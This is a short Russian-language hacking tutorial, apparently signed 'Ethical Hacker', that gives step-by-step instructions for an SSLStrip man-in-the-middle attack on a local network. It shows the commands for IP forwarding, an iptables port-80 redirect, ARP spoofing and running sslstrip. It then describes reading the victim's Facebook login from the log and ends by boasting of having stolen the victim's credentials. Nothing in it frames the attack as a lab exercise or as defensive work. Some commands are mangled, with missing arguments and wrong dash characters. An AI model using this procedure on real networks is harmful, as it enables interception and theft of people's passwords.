MITM-атака через HTTPS-соединение с SSLStrip

MITM-атака через HTTPS-соединение с SSLStrip

Этичный Хакер

MITM-атака с помощью SSLStrip прозрачно захватывает HTTP-трафик в сети, ищет HTTPS-ссылки и перенаправления, а затем сопоставляет эти соединения либо с аналогичными HTTP-соединениями, либо с аналогичными HTTPS-ссылками.

Он также поддерживает режимы для предоставления значка, который выглядит как значок блокировки, выборочного ведения журнала и отказа в сеансе.

Шаг 1. Мы должны настроить наш компьютер в режиме пересылки, чтобы наш компьютер мог пересылать каждый пакет, который не ожидался для вашего компьютера.

echo 1 > /proc/sys/net/ipv4/ip_forward

Шаг 2. Необходимо настроить iptables для перенаправления трафика с порта 80 на порт 8080, чтобы обеспечить исходящие соединения с sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Шаг 3: необходимо найти наш сетевой шлюз.

route -n

Шаг 4: Далее нам нужно найти IP-адрес нашей целевой машины

Шаг 5. Подмена ARP - это метод, с помощью которого злоумышленник отправляет (подделанный) Сообщения протокола разрешения адресов (ARP) в локальной сети.

arpspoof -i -t

Шаг 6: Теперь нам нужно прослушать порт 8080, открыв новое окно терминала.

sslstrip -l 8080

Шаг 7: Теперь мы должны перейти на компьютер жертвы и ввести Ex facebook.com в браузере, как мы знаем, facebook будет использовать HTTPS, но теперь проверьте с помощью компьютера-жертвы, мы можем видеть соединение, установленное через HTTP.

Шаг 8: Теперь перейдите в домашнюю папку и проверьте файл sslstrip.log, мы можем найти имя пользователя и пароль жертвы, введенные для входа в систему.

Это все, мы взломали учетные данные нашей жертвы.



Report Page